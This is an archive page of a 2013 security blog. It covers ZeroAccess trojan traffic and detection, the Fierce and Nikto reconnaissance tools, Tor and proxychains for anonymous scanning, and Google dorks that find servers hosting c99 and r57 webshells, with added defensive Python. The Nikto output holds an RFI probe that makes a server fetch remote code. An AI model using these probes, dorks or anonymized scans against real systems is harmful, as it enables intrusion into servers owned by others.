Friday, June 28, 2013

A few days ago, I talked about How to detect ZeroAccess in your Network. Now, I want to show you how this trojan works.

The goal of this trojan is to earn money through click fraud... It is a type of crime that abuses pay-per-click advertising to make money through fraudulent or fake clicks on advertisements. ZeroAccess makes money when it generates clicks on ads. In addition, ZeroAccess has its own botnet, which is ideal for generating a large number of clicks.

I got a sample of this trojan. I uploaded the binary to VirusTotal and only 3 antivirus programs detected it as a trojan. If you want a copy, contact me at the bottom of this page.

Currently, you can see how many antivirus programs detect the file as malware:
https://www.virustotal.com/es/file/0aae3d7df5c153378596ac03f1796b8800337e14e243529106cfc681005b7ab7/analysis/

I created a virtual machine and I executed this program in a fresh environment.

The first thing ZeroAccess does is connect to http://j.maxmind.com/app/geoip.js in order to geolocate the infected host.



The second thing the trojan does is connect to some visit counters. It seems the botnet operators want to know how many hosts they have infected.

http://www.e-zeeinternet.com/count.php?page=953121&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953130&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953131&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953001&style=LED_g&nbdigits=9
http://www.e-zeeinternet.com/count.php?page=953020&style=LED_g&nbdigits=9




Then the trojan sends malformed DNS requests... Wireshark dissects them as DNS traffic because the packets are sent over port 53, the port assigned to DNS, but it isn't really DNS traffic: the trojan is establishing connections with its C&C (command and control) servers and the packets are encrypted.


Finally, the trojan begins to generate traffic over port 16464/UDP.



Each time I restart the virtual machine, ZeroAccess generates a new code, which it sends to other infected hosts over port 16464/UDP:
9e56cb0d28948dabc9c0d199562fcf9e
975dec6d28948dabc9c0d19943b005e1
fcb23c0a28948dabc9c0d19957ffdbcf
a35ecde828948dabc9c0d199d52aaf97
...
...
...

Notice that part of the code is always the same: 28948dabc9c0d19. Maybe it identifies the node my computer is connected to.
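As an added example (not code from the original post), the following Python takes the four codes listed above and works out which byte positions stay fixed across all of them. That fixed run is the kind of invariant a network signature keys on, and the varying leading bytes are excluded automatically. The helper that renders the result in Snort content/offset/depth notation is an assumption about how a defender would use it, not something the post provides.

```python
"""Derive a byte-level invariant from captured UDP payload samples.

Added example, not from the original post. SAMPLES are the four hex codes
the post lists (payloads the trojan sends over 16464/UDP); everything else
is illustration.
"""
from typing import List, Optional, Tuple

# The four codes quoted in the post (16 bytes each, as hex).
SAMPLES = [
    "9e56cb0d28948dabc9c0d199562fcf9e",
    "975dec6d28948dabc9c0d19943b005e1",
    "fcb23c0a28948dabc9c0d19957ffdbcf",
    "a35ecde828948dabc9c0d199d52aaf97",
]


def invariant_bytes(samples: List[str]) -> List[bool]:
    """For each byte offset, True if every sample carries the same byte there."""
    raw = [bytes.fromhex(s) for s in samples]
    n = min(len(r) for r in raw)
    return [all(r[i] == raw[0][i] for r in raw) for i in range(n)]


def longest_fixed_run(samples: List[str]) -> Optional[Tuple[int, bytes]]:
    """Return (offset, bytes) of the longest run of positions that is identical
    across all samples, or None when nothing is shared."""
    mask = invariant_bytes(samples)
    best_start, best_len = 0, 0
    start = None
    # Append a sentinel False so a run that reaches the end is closed too.
    for i, same in enumerate(mask + [False]):
        if same and start is None:
            start = i
        elif not same and start is not None:
            if i - start > best_len:
                best_start, best_len = start, i - start
            start = None
    if best_len == 0:
        return None
    return best_start, bytes.fromhex(samples[0])[best_start:best_start + best_len]


def matches_signature(payload_hex: str, offset: int, pattern: bytes) -> bool:
    """Check a new payload against a derived (offset, pattern) signature."""
    data = bytes.fromhex(payload_hex)
    return data[offset:offset + len(pattern)] == pattern


def snort_content_hint(offset: int, pattern: bytes) -> str:
    """Render the invariant in Snort content/offset/depth notation (assumed usage)."""
    hexstr = " ".join(f"{b:02x}" for b in pattern)
    return f'content:"|{hexstr}|"; offset:{offset}; depth:{len(pattern)};'


if __name__ == "__main__":
    off, pat = longest_fixed_run(SAMPLES)
    print(f"invariant at byte {off}: {pat.hex()} ({len(pat)} bytes)")
    print(snort_content_hint(off, pat))
```

With the four samples the first four bytes differ every time and only the run starting at byte 4 is shared, so a rule anchored on those bytes with an offset does not depend on the changing prefix.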

See the map below, which I've created. In only three hours, the trojan made these connections with other servers or infected hosts over port 16464/UDP.
Zeroaccess supernodes part I


ZeroAccess also generates some traffic over port 123/UDP. It is the same case as the DNS traffic: it isn't real NTP traffic.



You can continue reading ZeroAccess Trojan - Network Analysis Part II


Posted on Friday, June 28, 2013 by Javier Nieto

2 comments

Friday, June 21, 2013

Fierce is a great script written in Perl by RSnake. This tool helps you with the first step of a pentest: reconnaissance.

The idea is to gather as much interesting details as possible about your target before starting the attack.

Fierce is used for DNS Enumeration and has been included in Backtrack and Kali Linux distributions.

It is a great tool for discovering non-contiguous IP address space belonging to a company. You can try a DNS zone transfer, DNS brute force, reverse lookups...




These are the Fierce options.

root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -h
fierce.pl (C) Copywrite 2006,2007 - By RSnake at http://ha.ckers.org/fierce/

    Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Options:
    -connect    Attempt to make http connections to any non RFC1918
        (public) addresses.  This will output the return headers but
        be warned, this could take a long time against a company with
        many targets, depending on network/machine lag.  I wouldn't
        recommend doing this unless it's a small company or you have a
        lot of free time on your hands (could take hours-days). 
        Inside the file specified the text "Host:\n" will be replaced
        by the host specified. Usage:

    perl fierce.pl -dns example.com -connect headers.txt

    -delay        The number of seconds to wait between lookups.
    -dns        The domain you would like scanned.
    -dnsfile      Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
    -dnsserver    Use a particular DNS server for reverse lookups
        (probably should be the DNS server of the target).  Fierce
        uses your DNS server for the initial SOA query and then uses
        the target's DNS server for all additional queries by default.
    -file        A file you would like to output to be logged to.
    -fulloutput    When combined with -connect this will output everything
        the webserver sends back, not just the HTTP headers.
    -help        This screen.
    -nopattern    Don't use a search pattern when looking for nearby
        hosts.  Instead dump everything.  This is really noisy but
        is useful for finding other domains that spammers might be
        using.  It will also give you lots of false positives,
        especially on large domains.
    -range        Scan an internal IP range (must be combined with
        -dnsserver).  Note, that this does not support a pattern
        and will simply output anything it finds.  Usage:

    perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

    -search        Search list.  When fierce attempts to traverse up and
        down ipspace it may encounter other servers within other
        domains that may belong to the same company.  If you supply a
        comma delimited list to fierce it will report anything found.
        This is especially useful if the corporate servers are named
        different from the public facing website.  Usage:

    perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

        Note that using search could also greatly expand the number of
        hosts found, as it will continue to traverse once it locates
        servers that you specified in your search list.  The more the
        better.
    -suppress    Suppress all TTY output (when combined with -file).
    -tcptimeout    Specify a different timeout (default 10 seconds).  You
        may want to increase this if the DNS server you are querying
        is slow or has a lot of network lag.
    -threads  Specify how many threads to use while scanning (default
      is single threaded).
    -traverse    Specify a number of IPs above and below whatever IP you
        have found to look for nearby IPs.  Default is 5 above and
        below.  Traverse will not move into other C blocks.
    -version    Output the version number.
    -wide        Scan the entire class C after finding any matching
        hostnames in that class C.  This generates a lot more traffic
        but can uncover a lot more information.
    -wordlist    Use a seperate wordlist (one word per line).  Usage:

    perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt 


We can do reverse lookups for an entire class C network like 65.55.58.0/24:
root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -range 65.55.58.0-255
65.55.58.2    ten1-2-194.co1-6nf-1a.ntwk.msn.net
65.55.58.3    ten1-2-194.co1-6nf-1b.ntwk.msn.net
65.55.58.38    discussions.connect.microsoft.com
65.55.58.183    submit.microsoft.com
65.55.58.186    cvp.membership.microsoft.com
65.55.58.192    microsoftevents.org
65.55.58.197    eugrantsadvisor.com
65.55.58.201    00001001.ch
65.55.58.202    bizspark.microsoft.com
65.55.58.204    cvp.services.microsoft.com
65.55.58.205    piinternalfe2.microsoft.com
65.55.58.206    cvp.services.ppe.microsoft.com
65.55.58.210    livests.test.itasignon.com
65.55.58.211    sts.test.itasignon.com
65.55.58.212    beta.itasignon.microsoft.com
65.55.58.213    itasignon.microsoft.com
65.55.58.214    websitespark.microsoft.com
65.55.58.241    co1vlsc04.microsoft.com
65.55.58.242    co1vlsc05.microsoft.com
65.55.58.243    co1vlsc06.microsoft.com
65.55.58.247    lva.beta.msllab.microsoft.com
65.55.58.248    pi.beta.msllab.microsoft.com


We can try a DNS zone transfer and a DNS brute force against google.es. You can choose the DNS server that the requests are sent to; if none is specified, Fierce queries the target company's own DNS servers. In this case, we send the requests to the OpenDNS server 208.67.222.222.
root@bt:/pentest/enumeration/dns/fierce# ./fierce.pl -dns google.es -dnsserver 208.67.222.222
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
...
...
...
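As an added example (not part of Fierce and not from the original post), here is a small Python parser for the output above. It pulls out the nameservers, whether the zone transfer was refused, the wildcard result and the discovered hosts, then groups the hosts by /24 so non-contiguous ranges stand out. It assumes Fierce's message strings are exactly as they appear in this run ("Unsuccessful in zone transfer", "Checking for wildcard DNS...", "Nope. Good.").

```python
"""Parse the text fierce prints and summarise what it found.

Added example, not part of fierce or of the original post. FIERCE_OUTPUT is
the run against google.es shown in the post, limited to the lines shown there.
"""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Tuple

FIERCE_OUTPUT = """\
DNS Servers for google.es:
    ns3.google.com
    ns2.google.com
    ns4.google.com
    ns1.google.com

Trying zone transfer first...
    Testing ns3.google.com
        Request timed out or transfer not allowed.
    Testing ns2.google.com
        Request timed out or transfer not allowed.
    Testing ns4.google.com
        Request timed out or transfer not allowed.
    Testing ns1.google.com
        Request timed out or transfer not allowed.

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 1895 test(s)...
173.194.41.241    academico.google.es
173.194.41.243    academico.google.es
173.194.41.240    academico.google.es
173.194.41.244    academico.google.es
173.194.41.242    academico.google.es
173.194.67.94    accounts.google.es
"""

# "<ip><whitespace><hostname>" lines from the brute-force / reverse-lookup phase.
HOST_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)$")


def parse_fierce(text: str):
    """Extract nameservers, zone-transfer result, wildcard result and discovered hosts."""
    result = {
        "nameservers": [],
        "zone_transfer_refused": False,
        "wildcard": None,   # stays None if the wildcard check never appears
        "hosts": [],        # list of (ip, hostname)
    }
    section = None
    expect_wildcard_answer = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_wildcard_answer:
            # Assumption: fierce prints "Nope. Good." only when no wildcard answers,
            # so any other line here is taken as a wildcard hit.
            result["wildcard"] = line != "Nope. Good."
            expect_wildcard_answer = False
            continue
        if line.startswith("DNS Servers for"):
            section = "ns"
            continue
        if line.startswith("Trying zone transfer"):
            section = "axfr"
            continue
        if line.startswith("Unsuccessful in zone transfer"):
            result["zone_transfer_refused"] = True
            section = None
            continue
        if line.startswith("Checking for wildcard DNS"):
            expect_wildcard_answer = True
            section = None
            continue
        if section == "ns":
            result["nameservers"].append(line)
            continue
        m = HOST_RE.match(line)
        if m:
            result["hosts"].append((m.group(1), m.group(2)))
    return result


def networks_by_24(hosts: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group discovered hostnames by /24; separate keys mean non-contiguous ranges."""
    groups: Dict[str, set] = defaultdict(set)
    for ip, name in hosts:
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        groups[str(net)].add(name)
    return {net: sorted(names) for net, names in sorted(groups.items())}


if __name__ == "__main__":
    summary = parse_fierce(FIERCE_OUTPUT)
    print("nameservers:", summary["nameservers"])
    print("zone transfer refused:", summary["zone_transfer_refused"])
    print("wildcard DNS:", summary["wildcard"])
    for net, names in networks_by_24(summary["hosts"]).items():
        print(net, "->", ", ".join(names))
```

Run against your own domain's Fierce output, the "zone transfer refused" flag is the first thing to check: a nameserver that answers AXFR hands the whole zone to anyone who asks.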


You can edit the brute-force wordlist as you like.
root@bt:/pentest/enumeration/dns/fierce# more hosts.txt
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
...
...
...



Posted on Friday, June 21, 2013 by Javier Nieto

No comments

Wednesday, June 19, 2013

Nikto is one of the most popular web security applications to use when starting a web pentesting project.

You can download Nikto from http://cirt.net/nikto2. This tool has been included in the Backtrack and Kali Linux distributions.

Nikto is an open source web server scanner. This tool performs tests against web servers by requesting multiple items. Nikto checks:

  • Over 6500 dangerous files/CGIs.
  • More than 1250 outdated versions of various web servers.
  • Specific problems on over 270 servers.
  • Presence of index files.
  • HTTP server options like TRACE.
  • Installed software and web servers.


Nikto sends a lot of requests quickly; it is not designed as a stealthy tool. If you run Nikto against a remote web server, the administrator will see many lines in the web server log that reveal the attack. Some SIEMs have default rules that correlate these log lines and raise an alarm to warn the administrators about the attack.

These are the Nikto options.
jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have found out the server and PHP versions and a lot of interesting folders.

We have discovered an RFI (Remote File Inclusion) on this server:
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL makes the server fetch PHP code from http://cirt.net/rfiinc.txt?, which contains the following code:
<?php phpinfo(); ?>

This code only runs phpinfo(), but the same vulnerability could be used to upload a web shell in order to gain access to the server.




The next line is interesting too. Nikto has located some URLs where files containing arbitrary source code could be uploaded.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
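Seen from the administrator's side of the web server log mentioned earlier, here is an added example (not Nikto's code and not from the original post) that parses Apache combined-format log lines and flags the scanner's User-Agent, TRACE requests, bursts of 404s and query parameters that carry a remote URL, like the /info.php?file=http://... RFI probe above. The log lines are constructed: the User-Agent follows the "Mozilla/5.00 (Nikto/...) (Evasions:...) (Test:...)" shape Nikto sends by default, the IPs and timestamps are made up, and the threshold of five distinct 404s is an assumed tuning value.

```python
"""Spot a Nikto-style scan and RFI probes in Apache combined-format logs.

Added example, not part of Nikto and not from the original post. SAMPLE_LOG
is constructed; only the probe paths are taken from the Nikto run in the post.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
NOT_FOUND_THRESHOLD = 5  # distinct 404s from one client before we call it forced browsing (assumed)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [19/Jun/2013:16:23:35 +0200] "GET / HTTP/1.1" 200 1028 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000001)"
203.0.113.10 - - [19/Jun/2013:16:23:36 +0200] "TRACE / HTTP/1.1" 200 0 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000055)"
203.0.113.10 - - [19/Jun/2013:16:23:36 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 213 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000120)"
203.0.113.10 - - [19/Jun/2013:16:23:37 +0200] "GET /datos/ HTTP/1.1" 404 213 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000121)"
203.0.113.10 - - [19/Jun/2013:16:23:37 +0200] "GET /temp/ HTTP/1.1" 404 213 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000122)"
203.0.113.10 - - [19/Jun/2013:16:23:38 +0200] "GET /tmp/ HTTP/1.1" 404 213 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000123)"
203.0.113.10 - - [19/Jun/2013:16:23:38 +0200] "GET /readme.txt HTTP/1.1" 404 213 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000124)"
203.0.113.10 - - [19/Jun/2013:16:23:39 +0200] "GET /info.php?file=http://cirt.net/rfiinc.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:003210)"
198.51.100.7 - - [19/Jun/2013:16:25:01 +0200] "GET /index.php HTTP/1.1" 200 4112 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
198.51.100.7 - - [19/Jun/2013:16:25:02 +0200] "GET /img/missing.png HTTP/1.1" 404 213 "http://www.example.es/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_probe(path: str) -> Optional[str]:
    """Return 'param=value' if any query parameter carries a remote URL, else None."""
    query = urlsplit(path).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if REMOTE_URL_RE.match(value):
                return f"{key}={value}"
    return None


def analyze(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Return {client_ip: [finding, ...]} for every client with at least one finding."""
    findings: Dict[str, List[str]] = defaultdict(list)
    not_found: Dict[str, set] = defaultdict(set)
    flagged_ua = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if "nikto" in rec["ua"].lower() and ip not in flagged_ua:
            flagged_ua.add(ip)
            findings[ip].append("scanner user-agent (Nikto)")
        if rec["method"] == "TRACE":
            findings[ip].append("TRACE request (XST check)")
        if rec["status"] == "404":
            not_found[ip].add(rec["path"])
        probe = rfi_probe(rec["path"])
        if probe:
            findings[ip].append(f"RFI probe: {probe}")
    for ip, paths in not_found.items():
        if len(paths) >= NOT_FOUND_THRESHOLD:
            findings[ip].append(f"{len(paths)} distinct 404s (forced browsing)")
    return dict(findings)


if __name__ == "__main__":
    for ip, items in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for item in items:
            print("  -", item)
```

The User-Agent check is the weakest signal, since it is trivially changed; the 404 burst and the remote URL in a query parameter survive that. On the server side the RFI itself is closed by keeping allow_url_include off in php.ini (its default) and never passing request data to include(), and TRACE is disabled in Apache with TraceEnable Off.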



Nikto is one of the first applications that I run when a client requests a web audit from me.


Posted on Wednesday, June 19, 2013 by Javier Nieto

2 comments

Friday, June 07, 2013

ZeroAccess is a Trojan horse that uses an advanced rootkit to hide itself and creates a back door on the compromised host.

Computers are infected by "drive-by download" attacks:
  1. People who download and execute suspicious programs (ActiveX, Java applets...) without understanding the consequences.
  2. Downloads that happen without the user's authorization (malware, browser exploits...).
You can learn how modern malware works by downloading "Modern Malware for Dummies".

ZeroAccess makes money through pay-per-click advertising using click fraud, which is a very lucrative business.

We aren't going to analyze this Trojan here. I want to show you how you can detect it with Fortigate firewalls and with Snort on OSSIM, without an antivirus.

This Trojan uses port 16464/udp, but I have also seen traffic on ports 16465/udp, 16470/udp and 16471/udp. You need to deny and log this traffic to detect it.

First, you need to create a custom service.



Then you need to create a policy rule at the top of your policies.


Finally, watch your logs and filter on the ID of this policy rule. The log entries will show the infected source IP.


If you are working with OSSIM and Snort, you should add the following rules to your policies.

First, go to "Policy & Actions" and click on "Trojan".


Type ZeroAccess and add all of the Snort results.


Finally go to Analysis --> Security Events and search the Signature ZeroAccess.
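Once the deny-and-log rule above is in place, the log lines it produces can be processed outside the firewall GUI. An added example (not the post's own detection rules): Python that reads FortiGate-style traffic-log lines and flags internal hosts that talk to several distinct peers on the ports listed above. The key names srcip, dstip, dstport, proto and action are real FortiOS traffic-log fields; the sample lines and addresses are constructed, and the peer threshold is an assumed tuning value.

```python
"""Flag hosts whose UDP traffic looks like the ZeroAccess peer-to-peer
channel described in the post.

Added example, not the post's own detection rules. SAMPLE_LOG is
constructed in FortiGate key=value syslog form; the addresses are made up.
A single UDP packet to 16464 is weak evidence, but one internal host
contacting many distinct peers on these ports is the behaviour worth alerting on.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Ports named in the post: 16464/udp plus 16465, 16470 and 16471.
ZEROACCESS_UDP_PORTS = {16464, 16465, 16470, 16471}
# Alert when one internal host contacts at least this many distinct peers (assumed value).
PEER_THRESHOLD = 3

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
date=2013-06-07 time=10:01:02 srcip=192.168.1.20 srcport=51234 dstip=203.0.113.5 dstport=16464 proto=17 action=deny policyid=7
date=2013-06-07 time=10:01:03 srcip=192.168.1.20 srcport=51234 dstip=198.51.100.9 dstport=16464 proto=17 action=deny policyid=7
date=2013-06-07 time=10:01:03 srcip=192.168.1.20 srcport=51234 dstip=203.0.113.77 dstport=16471 proto=17 action=deny policyid=7
date=2013-06-07 time=10:01:04 srcip=192.168.1.20 srcport=51234 dstip=198.51.100.40 dstport=16470 proto=17 action=deny policyid=7
date=2013-06-07 time=10:01:05 srcip=192.168.1.31 srcport=40000 dstip=203.0.113.5 dstport=16464 proto=17 action=deny policyid=7
date=2013-06-07 time=10:01:06 srcip=192.168.1.31 srcport=40001 dstip=8.8.8.8 dstport=53 proto=17 action=accept policyid=2
date=2013-06-07 time=10:01:07 srcip=192.168.1.44 srcport=40002 dstip=203.0.113.5 dstport=16464 proto=6 action=accept policyid=2
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value syslog line into a dict (surrounding quotes stripped)."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def peers_by_source(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Map each source IP to the distinct peers it reached on the P2P ports (UDP only)."""
    peers: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if "srcip" not in rec or "dstip" not in rec:
            continue
        try:
            port = int(rec.get("dstport", "0"))
            proto = int(rec.get("proto", "0"))
        except ValueError:
            continue
        # proto=17 is UDP; TCP hits on the same ports are ignored here.
        if proto == 17 and port in ZEROACCESS_UDP_PORTS:
            peers[rec["srcip"]].add(rec["dstip"])
    return peers


def suspected_infections(lines: Iterable[str], threshold: int = PEER_THRESHOLD) -> List[str]:
    """Return the source IPs that reached at least `threshold` distinct peers, sorted."""
    return sorted(src for src, p in peers_by_source(lines).items() if len(p) >= threshold)


if __name__ == "__main__":
    for src in suspected_infections(SAMPLE_LOG.splitlines()):
        print(f"possible ZeroAccess host: {src}")
```

Counting distinct peers rather than packets is what separates an infected host from a single stray datagram, and restricting the match to UDP keeps unrelated TCP connections on the same port numbers out of the count.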





Posted on Friday, June 07, 2013 by Javier Nieto

3 comments

Wednesday, June 05, 2013

Are you using an anonymizer?

Anonymizing your connection is one of the main requirements when you want to do bad things... For this purpose we are going to use Tor.

 "Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis"



First we install Tor:
sudo apt-get install tor
 
Then, we are going to install Proxychains in order to run applications through Tor.
sudo apt-get install proxychains

Then we need to configure Proxychains. We need to know which port Tor is listening on.


Finally, edit /etc/proxychains.conf and add the following line:
socks4 127.0.0.1 9050

Now we can run, for example, nmap anonymously.



You can also configure your browser to surf the Internet through Tor without Proxychains.

First, edit your Connection Settings and add a manual proxy.



Now your connections are hidden. You can check it on http://whatismyipaddress.com/, for example.

Note that my Services entry says "Tor Exit Node" and that's not my real IP.



Finally you will work without worries...







Posted on Wednesday, June 05, 2013 by Javier Nieto

2 comments

Tuesday, June 04, 2013

In this post we are going to use Google to search for servers that have been compromised and are hosting a webshell.

The most common method of getting a webshell onto a server is RFI (Remote File Inclusion). RFI is a vulnerability that allows an attacker to make the server load a remote file, such as a script or webshell.

With a webshell, you can manage the server: read, create, remove and upload files, execute commands on the remote server...

Common webshells are c99.php, c100.php, r57.php...

You can find servers hosting these webshells with the following Google dorks.

 * Note that some results no longer contain webshells because the administrators have removed the shell from their servers or the webmasters are using black-hat SEO.

inurl:"c99.php/" "uname -a"



inurl:"b374k.php/" 



inurl:"c100.php" "uname -a"



inurl:r57.php
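The same indicators the dorks rely on (well-known shell filenames and the "uname -a" banner such shells print) can be searched on your own servers before anyone else finds them with Google. As an added example that is not from the original post, this Python walks a web root and reports PHP files that carry one of those names, that banner, or an eval() of a decoded payload. build_sample_webroot() creates a constructed tree in a temporary directory; its flagged files are harmless stand-ins containing only the indicator strings.

```python
"""Hunt for webshell indicators under a web root.

Added example, not from the original post. The filenames come from the post;
the content patterns are common webshell traits. The sample web root is
constructed and its "shells" are inert stand-ins.
"""
import os
import re
import tempfile
from typing import List, Tuple

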